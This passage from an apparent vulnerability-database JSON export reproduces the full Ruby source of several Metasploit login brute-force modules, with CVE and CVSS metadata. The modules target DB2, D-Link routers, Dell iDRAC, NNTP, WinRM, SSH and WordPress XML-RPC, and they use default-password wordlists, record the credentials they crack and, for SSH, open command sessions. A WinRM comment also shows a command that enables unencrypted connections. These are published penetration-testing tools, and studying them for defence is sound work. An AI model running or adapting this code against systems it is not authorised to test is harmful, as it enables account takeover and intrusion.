Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'DB2 Authentication Brute Force Utility',\n 'Description' => %q{This module attempts to authenticate against a DB2\n instance using username and password combinations indicated by the\n USER_FILE, PASS_FILE, and USERPASS_FILE options.},\n 'Author' => ['todb'],\n 'References' =>\n [\n [ 'CVE', '1999-0502'] # Weak password\n ],\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n Opt::Proxies,\n OptPath.new('USERPASS_FILE', [ false, \"File containing (space-separated) users and passwords, one pair per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"db2_default_userpass.txt\") ]),\n OptPath.new('USER_FILE', [ false, \"File containing users, one per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"db2_default_user.txt\") ]),\n OptPath.new('PASS_FILE', [ false, \"File containing passwords, one per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"db2_default_pass.txt\") ]),\n ])\n\n deregister_options('PASSWORD_SPRAY')\n end\n\n def run_host(ip)\n cred_collection = Metasploit::Framework::CredentialCollection.new(\n blank_passwords: datastore['BLANK_PASSWORDS'],\n pass_file: datastore['PASS_FILE'],\n password: datastore['PASSWORD'],\n user_file: datastore['USER_FILE'],\n userpass_file: datastore['USERPASS_FILE'],\n username: datastore['USERNAME'],\n user_as_pass: datastore['USER_AS_PASS'],\n realm: datastore['DATABASE']\n )\n\n cred_collection = prepend_db_passwords(cred_collection)\n\n scanner = Metasploit::Framework::LoginScanner::DB2.new(\n host: ip,\n port: rport,\n proxies: datastore['PROXIES'],\n cred_details: cred_collection,\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n connection_timeout: 30,\n max_send_size: datastore['TCP::max_send_size'],\n send_delay: datastore['TCP::send_delay'],\n framework: framework,\n framework_module: self,\n ssl: datastore['SSL'],\n ssl_version: datastore['SSLVersion'],\n ssl_verify_mode: datastore['SSLVerifyMode'],\n ssl_cipher: datastore['SSLCipher'],\n local_port: datastore['CPORT'],\n local_host: datastore['CHOST']\n )\n\n scanner.scan! do |result|\n credential_data = result.to_h\n credential_data.merge!(\n module_fullname: self.fullname,\n workspace_id: myworkspace_id\n )\n if result.success?\n credential_core = create_credential(credential_data)\n credential_data[:core] = credential_core\n create_credential_login(credential_data)\n\n print_good \"#{ip}:#{rport} - Login Successful: #{result.credential}\"\n else\n invalidate_login(credential_data)\n vprint_error \"#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})\"\n end\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/db2/db2_auth.rb"}, {"lastseen": "2020-03-09T06:49:47", "description": "This module attempts to authenticate to different D-Link HTTP management services. It has been tested successfully on D-Link DIR-300 Hardware revision B, D-Link DIR-600 Hardware revision B, D-Link DIR-815 Hardware revision A and DIR-645 Hardware revision A devices. It is possible that this module also works with other models.\n", "published": "2013-04-04T19:41:10", "type": "metasploit", "title": "D-Link DIR-300B / DIR-600B / DIR-815 / DIR-645 HTTP Login Utility", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502"], "modified": "2017-08-27T01:01:10", "id": "MSF:AUXILIARY/SCANNER/HTTP/DLINK_DIR_SESSION_CGI_HTTP_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'D-Link DIR-300B / DIR-600B / DIR-815 / DIR-645 HTTP Login Utility',\n 'Description' => %q{\n This module attempts to authenticate to different D-Link HTTP management\n services. It has been tested successfully on D-Link DIR-300 Hardware revision B,\n D-Link DIR-600 Hardware revision B, D-Link DIR-815 Hardware revision A and DIR-645\n Hardware revision A devices. It is possible that this module also works with other\n models.\n },\n 'Author' =>\n [\n 'hdm',\t#http_login module\n 'Michael Messner <devnull[at]s3cur1ty.de>'\t#dlink login included\n ],\n 'References' =>\n [\n [ 'CVE', '1999-0502'] # Weak password\n ],\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n OptString.new('USERNAME', [ false, \"Username for authentication (default: admin)\",\"admin\" ]),\n OptPath.new('PASS_FILE', [ false, \"File containing passwords, one per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"http_default_pass.txt\") ]),\n ])\n\n deregister_options('HttpUsername', 'HttpPassword')\n end\n\n def target_url\n proto = \"http\"\n if rport == 443 or ssl\n proto = \"https\"\n end\n \"#{proto}://#{rhost}:#{rport}#{@uri.to_s}\"\n end\n\n def is_dlink?\n response = send_request_cgi({\n 'uri' => @uri,\n 'method' => 'GET'\n })\n\n if response and response.headers['Server'] and response.headers['Server'] =~ /Linux,\\ HTTP\\/1.1,\\ DIR-.*Ver\\ .*/\n return true\n else\n return false\n end\n end\n\n def run_host(ip)\n\n @uri = \"/session.cgi\"\n\n if is_dlink?\n vprint_good(\"#{target_url} - D-Link device detected\")\n else\n vprint_error(\"#{target_url} - D-Link device doesn't detected\")\n return\n end\n\n print_status(\"#{target_url} - Attempting to login\")\n\n each_user_pass { |user, pass|\n do_login(user, pass)\n }\n end\n\n def report_cred(opts)\n service_data = {\n address: opts[:ip],\n port: opts[:port],\n service_name: (ssl ? 'https' : 'http'),\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: opts[:user],\n private_data: opts[:password],\n private_type: :password\n }.merge(service_data)\n\n login_data = {\n last_attempted_at: DateTime.now,\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::SUCCESSFUL,\n proof: opts[:proof]\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n # default to user=admin without password (default on most dlink routers)\n def do_login(user='admin', pass='')\n vprint_status(\"#{target_url} - Trying username:'#{user}' with password:'#{pass}'\")\n\n response = do_http_login(user,pass)\n result = determine_result(response)\n\n if result == :success\n print_good(\"#{target_url} - Successful login '#{user}' : '#{pass}'\")\n\n report_cred(ip: rhost, port: rport, user: user, password: pass, proof: response.inspect)\n\n return :next_user\n else\n vprint_error(\"#{target_url} - Failed to login as '#{user}'\")\n return\n end\n end\n\n def do_http_login(user,pass)\n begin\n response = send_request_cgi({\n 'uri' => @uri,\n 'method' => 'POST',\n 'vars_post' => {\n \"REPORT_METHOD\" => \"xml\",\n \"ACTION\" => \"login_plaintext\",\n \"USER\" => user,\n \"PASSWD\" => pass,\n \"CAPTCHA\" => \"\"\n }\n })\n return if response.nil?\n return if (response.code == 404)\n\n return response\n rescue ::Rex::ConnectionError\n vprint_error(\"#{target_url} - Failed to connect to the web server\")\n return nil\n end\n end\n\n def determine_result(response)\n return :abort if response.nil?\n return :abort unless response.kind_of? Rex::Proto::Http::Response\n return :abort unless response.code\n if response.body =~ /\\<RESULT\\>SUCCESS\\<\\/RESULT\\>/\n return :success\n end\n return :fail\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb"}, {"lastseen": "2020-07-15T20:55:28", "description": "This module attempts to login to a iDRAC webserver instance using default username and password. Tested against Dell Remote Access Controller 6 - Express version 1.50 and 1.85\n", "published": "2012-09-27T06:33:11", "type": "metasploit", "title": "Dell iDRAC Default Login", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502"], "modified": "2017-07-24T13:26:21", "id": "MSF:AUXILIARY/SCANNER/HTTP/DELL_IDRAC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'Dell iDRAC Default Login',\n 'Description' => %q{\n This module attempts to login to a iDRAC webserver instance using\n default username and password. Tested against Dell Remote Access\n Controller 6 - Express version 1.50 and 1.85\n },\n 'Author' =>\n [\n 'Cristiano Maruti <cmaruti[at]gmail.com>'\n ],\n 'References' =>\n [\n ['CVE', '1999-0502'] # Weak password\n ],\n 'License' => MSF_LICENSE\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Path to the iDRAC Administration page', '/data/login']),\n OptPath.new('USER_FILE', [ false, \"File containing users, one per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"idrac_default_user.txt\") ]),\n OptPath.new('PASS_FILE', [ false, \"File containing passwords, one per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"idrac_default_pass.txt\") ]),\n OptInt.new('RPORT', [true, \"Default remote port\", 443])\n ])\n\n register_advanced_options([\n OptBool.new('SSL', [true, \"Negotiate SSL connection\", true])\n ])\n end\n\n def target_url\n proto = \"http\"\n if rport == 443 or ssl\n proto = \"https\"\n end\n uri = normalize_uri(datastore['URI'])\n \"#{proto}://#{vhost}:#{rport}#{uri}\"\n end\n\n def do_login(user=nil, pass=nil)\n\n uri = normalize_uri(target_uri.path)\n auth = send_request_cgi({\n 'method' => 'POST',\n 'uri' => uri,\n 'SSL' => true,\n 'vars_post' => {\n 'user' => user,\n 'password' => pass\n }\n })\n\n if(auth and auth.body.to_s.match(/<authResult>[0|5]<\\/authResult>/) != nil )\n print_good(\"#{target_url} - SUCCESSFUL login for user '#{user}' with password '#{pass}'\")\n report_cred(\n ip: rhost,\n port: rport,\n service_name: (ssl ? 'https' : 'http'),\n user: user,\n password: pass,\n proof: auth.body.to_s\n )\n return :next_user\n else\n print_error(\"#{target_url} - Dell iDRAC - Failed to login as '#{user}' with password '#{pass}'\")\n end\n end\n\n def report_cred(opts)\n service_data = {\n address: opts[:ip],\n port: opts[:port],\n service_name: opts[:service_name],\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: opts[:user],\n private_data: opts[:password],\n private_type: :password\n }.merge(service_data)\n\n login_data = {\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::SUCCESSFUL,\n proof: opts[:proof]\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n def run_host(ip)\n print_status(\"Verifying that login page exists at #{ip}\")\n uri = normalize_uri(target_uri.path)\n begin\n res = send_request_raw({\n 'method' => 'GET',\n 'uri' => uri\n })\n\n if (res and res.code == 200 and res.body.to_s.match(/<authResult>1/) != nil)\n print_status(\"Attempting authentication\")\n\n each_user_pass { |user, pass|\n do_login(user, pass)\n }\n\n elsif (res and res.code == 301)\n print_error(\"#{target_url} - Page redirect to #{res.headers['Location']}\")\n return :abort\n else\n print_error(\"The iDRAC login page does not exist at #{ip}\")\n return :abort\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout\n rescue ::Timeout::Error, ::Errno::EPIPE\n rescue ::OpenSSL::SSL::SSLError => e\n return if(e.to_s.match(/^SSL_connect /) ) # strange errors / exception if SSL connection aborted\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/dell_idrac.rb"}, {"lastseen": "2020-07-19T07:11:16", "description": "This module attempts to authenticate to NNTP services which support the AUTHINFO authentication extension. This module supports AUTHINFO USER/PASS authentication, but does not support AUTHINFO GENERIC or AUTHINFO SASL authentication methods.\n", "published": "2017-06-15T20:25:40", "type": "metasploit", "title": "NNTP Login Utility", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502"], "modified": "2019-03-05T19:04:49", "id": "MSF:AUXILIARY/SCANNER/NNTP/NNTP_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Scanner\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'NNTP Login Utility',\n 'Description' => %q{\n This module attempts to authenticate to NNTP services\n which support the AUTHINFO authentication extension.\n\n This module supports AUTHINFO USER/PASS authentication,\n but does not support AUTHINFO GENERIC or AUTHINFO SASL\n authentication methods.\n },\n 'Author' => 'bcoles',\n 'License' => MSF_LICENSE,\n 'References' => [ [ 'CVE', '1999-0502' ], # Weak password\n [ 'URL', 'https://tools.ietf.org/html/rfc3977' ],\n [ 'URL', 'https://tools.ietf.org/html/rfc4642' ],\n [ 'URL', 'https://tools.ietf.org/html/rfc4643' ] ]))\n register_options(\n [\n Opt::RPORT(119),\n OptPath.new('USER_FILE', [ false, 'The file that contains a list of probable usernames.',\n File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_users.txt') ]),\n OptPath.new('PASS_FILE', [ false, 'The file that contains a list of probable passwords.',\n File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt') ])\n ])\n end\n\n def run_host(ip)\n begin\n connect\n return :abort unless nntp?\n return :abort unless supports_authinfo?\n\n report_service :host => rhost,\n :port => rport,\n :proto => 'tcp',\n :name => 'nntp'\n disconnect\n\n each_user_pass { |user, pass| do_login user, pass }\n rescue ::Interrupt\n raise $ERROR_INFO\n rescue EOFError, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout\n print_error \"#{peer} Connection failed\"\n return\n rescue OpenSSL::SSL::SSLError => e\n print_error \"SSL negotiation failed: #{e}\"\n rescue => e\n print_error \"#{peer} Error: #{e.class} #{e} #{e.backtrace}\"\n return\n ensure\n disconnect\n end\n end\n\n def nntp?\n banner = sock.get_once\n\n if !banner\n vprint_error \"#{peer} No response\"\n return false\n end\n\n if banner !~ /^200/\n print_error 'Unexpected reply'\n return false\n end\n\n vprint_status 'Server is a NTTP server'\n vprint_status \"Banner: #{banner}\"\n true\n end\n\n def supports_authinfo?\n sock.put \"HELP\\r\\n\"\n res = sock.get(-1)\n code = res.scan(/\\A(\\d+)\\s/).flatten.first.to_i\n\n if code.nil?\n print_error 'Server is not a NNTP server'\n return false\n end\n\n if code == 480\n vprint_warning 'Authentication is required before listing authentication capabilities.'\n return true\n end\n\n if code == 100 && res =~ /authinfo/i\n vprint_status 'Server supports AUTHINFO'\n return true\n end\n\n print_error 'Server does not support AUTHINFO'\n false\n end\n\n def do_login(user, pass)\n vprint_status \"Trying username:'#{user}' with password:'#{pass}'\"\n\n begin\n connect\n sock.get_once\n\n sock.put \"AUTHINFO USER #{user}\\r\\n\"\n res = sock.get_once\n unless res\n vprint_error \"#{peer} No response\"\n return :abort\n end\n\n code = res.scan(/\\A(\\d+)\\s/).flatten.first.to_i\n if code != 381\n vprint_error \"#{peer} Unexpected reply. Skipping user...\"\n return :skip_user\n end\n\n sock.put \"AUTHINFO PASS #{pass}\\r\\n\"\n res = sock.get_once\n unless res\n vprint_error \"#{peer} No response\"\n return :abort\n end\n\n code = res.scan(/\\A(\\d+)\\s/).flatten.first.to_i\n if code == 452 || code == 481\n vprint_error \"#{peer} Login failed\"\n return\n elsif code == 281\n print_good \"#{peer} Successful login with: '#{user}' : '#{pass}'\"\n report_cred ip: rhost,\n port: rport,\n service_name: 'nntp',\n user: user,\n password: pass,\n proof: code.to_s\n return :next_user\n else\n vprint_error \"#{peer} Failed login as: '#{user}' - Unexpected reply: #{res.inspect}\"\n return\n end\n rescue EOFError, ::Rex::ConnectionError, ::Errno::ECONNREFUSED, ::Errno::ETIMEDOUT\n print_error 'Connection failed'\n return\n rescue OpenSSL::SSL::SSLError => e\n print_error \"SSL negotiation failed: #{e}\"\n return :abort\n end\n rescue => e\n print_error \"Error: #{e}\"\n return nil\n ensure\n disconnect\n end\n\n def report_cred(opts)\n service_data = { address: opts[:ip],\n port: opts[:port],\n service_name: opts[:service_name],\n protocol: 'tcp',\n workspace_id: myworkspace_id }\n\n credential_data = { origin_type: :service,\n module_fullname: fullname,\n username: opts[:user],\n private_data: opts[:password],\n private_type: :password }.merge service_data\n\n login_data = { last_attempted_at: DateTime.now,\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::SUCCESSFUL,\n proof: opts[:proof] }.merge service_data\n\n create_credential_login login_data\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/nntp/nntp_login.rb"}, {"lastseen": "2020-01-14T00:25:48", "description": "This module attempts to authenticate to a WinRM service. It currently works only if the remote end allows Negotiate(NTLM) authentication. Kerberos is not currently supported. Please note: in order to use this module without SSL, the 'AllowUnencrypted' winrm option must be set. Otherwise adjust the port and set the SSL options in the module as appropriate.\n", "published": "2012-10-26T00:57:29", "type": "metasploit", "title": "WinRM Login Utility", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502"], "modified": "2019-06-27T22:06:32", "id": "MSF:AUXILIARY/SCANNER/WINRM/WINRM_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/ntlm/message'\nrequire 'metasploit/framework/credential_collection'\nrequire 'metasploit/framework/login_scanner'\nrequire 'metasploit/framework/login_scanner/winrm'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::WinRM\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'WinRM Login Utility',\n 'Description' => %q{\n This module attempts to authenticate to a WinRM service. It currently\n works only if the remote end allows Negotiate(NTLM) authentication.\n Kerberos is not currently supported. Please note: in order to use this\n module without SSL, the 'AllowUnencrypted' winrm option must be set.\n Otherwise adjust the port and set the SSL options in the module as appropriate.\n },\n 'Author' => [ 'thelightcosine' ],\n 'References' =>\n [\n [ 'CVE', '1999-0502'] # Weak password\n ],\n 'License' => MSF_LICENSE\n )\n\n deregister_options('PASSWORD_SPRAY')\n end\n\n\n def run_host(ip)\n cred_collection = Metasploit::Framework::CredentialCollection.new(\n blank_passwords: datastore['BLANK_PASSWORDS'],\n pass_file: datastore['PASS_FILE'],\n password: datastore['PASSWORD'],\n user_file: datastore['USER_FILE'],\n userpass_file: datastore['USERPASS_FILE'],\n username: datastore['USERNAME'],\n user_as_pass: datastore['USER_AS_PASS'],\n realm: datastore['DOMAIN'],\n )\n\n cred_collection = prepend_db_passwords(cred_collection)\n\n scanner = Metasploit::Framework::LoginScanner::WinRM.new(\n host: ip,\n port: rport,\n proxies: datastore[\"PROXIES\"],\n cred_details: cred_collection,\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n connection_timeout: 10,\n framework: framework,\n framework_module: self,\n )\n\n scanner.scan! do |result|\n credential_data = result.to_h\n credential_data.merge!(\n module_fullname: self.fullname,\n workspace_id: myworkspace_id\n )\n if result.success?\n credential_core = create_credential(credential_data)\n credential_data[:core] = credential_core\n create_credential_login(credential_data)\n\n print_good \"#{ip}:#{rport} - Login Successful: #{result.credential}\"\n else\n invalidate_login(credential_data)\n vprint_error \"#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})\"\n end\n end\n\n end\n\n\n def test_request\n return winrm_wql_msg(\"Select Name,Status from Win32_Service\")\n end\nend\n\n=begin\nTo set the AllowUncrypted option:\nwinrm set winrm/config/service @{AllowUnencrypted=\"true\"}\n=end\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/winrm/winrm_login.rb"}, {"lastseen": "2020-06-24T00:10:53", "description": "This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.\n", "published": "2014-10-21T18:06:35", "type": "metasploit", "title": "SSH Login Check Scanner", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502"], "modified": "2020-06-21T20:21:40", "id": "MSF:AUXILIARY/SCANNER/SSH/SSH_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'net/ssh'\nrequire 'net/ssh/command_stream'\nrequire 'metasploit/framework/login_scanner/ssh'\nrequire 'metasploit/framework/credential_collection'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::CommandShell\n include Msf::Auxiliary::Scanner\n include Msf::Exploit::Remote::SSH::Options\n\n def initialize\n super(\n 'Name' => 'SSH Login Check Scanner',\n 'Description' => %q{\n This module will test ssh logins on a range of machines and\n report successful logins. If you have loaded a database plugin\n and connected to a database this module will record successful\n logins and hosts so you can track your access.\n },\n 'Author' => ['todb'],\n 'References' =>\n [\n [ 'CVE', '1999-0502'] # Weak password\n ],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {'VERBOSE' => false} # Disable annoying connect errors\n )\n\n register_options(\n [\n Opt::RPORT(22)\n ], self.class\n )\n\n register_advanced_options(\n [\n Opt::Proxies,\n OptBool.new('SSH_DEBUG', [false, 'Enable SSH debugging output (Extreme verbosity!)', false]),\n OptInt.new('SSH_TIMEOUT', [false, 'Specify the maximum time to negotiate a SSH session', 30]),\n OptBool.new('GatherProof', [true, 'Gather proof of access via pre-session shell commands', true])\n ]\n )\n\n deregister_options('PASSWORD_SPRAY')\n end\n\n def rport\n datastore['RPORT']\n end\n\n def session_setup(result, scanner)\n return unless scanner.ssh_socket\n\n # Create a new session\n conn = Net::SSH::CommandStream.new(scanner.ssh_socket)\n\n merge_me = {\n 'USERPASS_FILE' => nil,\n 'USER_FILE' => nil,\n 'PASS_FILE' => nil,\n 'USERNAME' => result.credential.public,\n 'PASSWORD' => result.credential.private\n }\n info = \"#{proto_from_fullname} #{result.credential} (#{@ip}:#{rport})\"\n s = start_session(self, info, merge_me, false, conn.lsock)\n self.sockets.delete(scanner.ssh_socket.transport.socket)\n\n # Set the session platform\n s.platform = scanner.get_platform(result.proof)\n\n # Create database host information\n host_info = {host: scanner.host}\n\n unless s.platform == 'unknown'\n host_info[:os_name] = s.platform\n end\n\n report_host(host_info)\n\n s\n end\n\n\n def run_host(ip)\n @ip = ip\n\n cred_collection = Metasploit::Framework::CredentialCollection.new(\n blank_passwords: datastore['BLANK_PASSWORDS'],\n pass_file: datastore['PASS_FILE'],\n password: datastore['PASSWORD'],\n user_file: datastore['USER_FILE'],\n userpass_file: datastore['USERPASS_FILE'],\n username: datastore['USERNAME'],\n user_as_pass: datastore['USER_AS_PASS'],\n )\n\n cred_collection = prepend_db_passwords(cred_collection)\n\n scanner = Metasploit::Framework::LoginScanner::SSH.new(\n host: ip,\n port: rport,\n cred_details: cred_collection,\n proxies: datastore['Proxies'],\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n connection_timeout: datastore['SSH_TIMEOUT'],\n framework: framework,\n framework_module: self,\n skip_gather_proof: !datastore['GatherProof']\n )\n\n scanner.verbosity = :debug if datastore['SSH_DEBUG']\n\n scanner.scan! do |result|\n credential_data = result.to_h\n credential_data.merge!(\n module_fullname: self.fullname,\n workspace_id: myworkspace_id\n )\n case result.status\n when Metasploit::Model::Login::Status::SUCCESSFUL\n print_brute :level => :good, :ip => ip, :msg => \"Success: '#{result.credential}' '#{result.proof.to_s.gsub(/[\\r\\n\\e\\b\\a]/, ' ')}'\"\n credential_data[:private_type] = :password\n credential_core = create_credential(credential_data)\n credential_data[:core] = credential_core\n create_credential_login(credential_data)\n session_setup(result, scanner) if datastore['CreateSession']\n if datastore['GatherProof'] && scanner.get_platform(result.proof) == 'unknown'\n msg = \"While a session may have opened, it may be bugged. If you experience issues with it, re-run this module with\"\n msg << \" 'set gatherproof false'. Also consider submitting an issue at github.com/rapid7/metasploit-framework with\"\n msg << \" device details so it can be handled in the future.\"\n print_brute :level => :error, :ip => ip, :msg => msg\n end\n :next_user\n when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT\n vprint_brute :level => :verror, :ip => ip, :msg => \"Could not connect: #{result.proof}\"\n scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?\n invalidate_login(credential_data)\n :abort\n when Metasploit::Model::Login::Status::INCORRECT\n vprint_brute :level => :verror, :ip => ip, :msg => \"Failed: '#{result.credential}'\"\n invalidate_login(credential_data)\n scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?\n else\n invalidate_login(credential_data)\n scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?\n end\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ssh/ssh_login.rb"}, {"lastseen": "2020-01-15T22:56:35", "description": "This module attempts to authenticate against a Wordpress-site (via XMLRPC) using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.\n", "published": "2014-07-25T13:24:09", "type": "metasploit", "title": "Wordpress XML-RPC Username/Password Login Scanner", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502"], "modified": "2019-06-27T22:06:32", "id": "MSF:AUXILIARY/SCANNER/HTTP/WORDPRESS_XMLRPC_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/credential_collection'\nrequire 'metasploit/framework/login_scanner/wordpress_rpc'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HTTP::Wordpress\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Wordpress XML-RPC Username/Password Login Scanner',\n 'Description' => '\n This module attempts to authenticate against a Wordpress-site\n (via XMLRPC) using username and password combinations indicated\n by the USER_FILE, PASS_FILE, and USERPASS_FILE options.\n ',\n 'Author' =>\n [\n 'Cenk Kalpakoglu <cenk.kalpakoglu[at]gmail.com>',\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['URL', 'https://wordpress.org/'],\n ['URL', 'http://www.ethicalhack3r.co.uk/security/introduction-to-the-wordpress-xml-rpc-api/'],\n ['CVE', '1999-0502'] # Weak password\n ]\n ))\n\n register_options(\n [\n Opt::RPORT(80),\n ])\n\n deregister_options('BLANK_PASSWORDS', 'PASSWORD_SPRAY') # we don't need these options\n end\n\n def run_host(ip)\n print_status(\"#{peer}:#{wordpress_url_xmlrpc} - Sending Hello...\")\n if wordpress_xmlrpc_enabled?\n vprint_good(\"XMLRPC enabled, Hello message received!\")\n else\n print_error(\"XMLRPC is not enabled! Aborting\")\n return :abort\n end\n\n print_status(\"Starting XML-RPC login sweep...\")\n\n cred_collection = Metasploit::Framework::CredentialCollection.new(\n blank_passwords: datastore['BLANK_PASSWORDS'],\n pass_file: datastore['PASS_FILE'],\n password: datastore['PASSWORD'],\n user_file: datastore['USER_FILE'],\n userpass_file: datastore['USERPASS_FILE'],\n username: datastore['USERNAME'],\n user_as_pass: datastore['USER_AS_PASS'],\n )\n\n scanner = Metasploit::Framework::LoginScanner::WordpressRPC.new(\n configure_http_login_scanner(\n uri: wordpress_url_xmlrpc,\n cred_details: cred_collection,\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n connection_timeout: 5,\n http_username: datastore['HttpUsername'],\n http_password: datastore['HttpPassword']\n )\n )\n\n scanner.scan! do |result|\n credential_data = result.to_h\n credential_data.merge!(\n module_fullname: self.fullname,\n workspace_id: myworkspace_id\n )\n case result.status\n when Metasploit::Model::Login::Status::SUCCESSFUL\n print_brute :level => :good, :ip => ip, :msg => \"Success: '#{result.credential}'\"\n credential_core = create_credential(credential_data)\n credential_data[:core] = credential_core\n create_credential_login(credential_data)\n :next_user\n when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT\n if datastore['VERBOSE']\n print_brute :level => :verror, :ip => ip, :msg => \"Could not connect\"\n end\n invalidate_login(credential_data)\n :abort\n when Metasploit::Model::Login::Status::INCORRECT\n if datastore['VERBOSE']\n print_brute :level => :verror, :ip => ip, :msg => \"Failed: '#{result.credential}'\"\n end\n invalidate_login(credential_data)\n end\n end\n\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb"}, {"lastseen": "2020-01-01T18:28:19", "description": "This module attempts to authenticate to the VMWare HTTP service for VmWare Server, ESX, and ESXI\n", "published": "2012-02-06T16:15:05", "type": "metasploit", "title": "VMWare Web Login Scanner", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502"], "modified": "2018-11-01T07:26:12", "id": 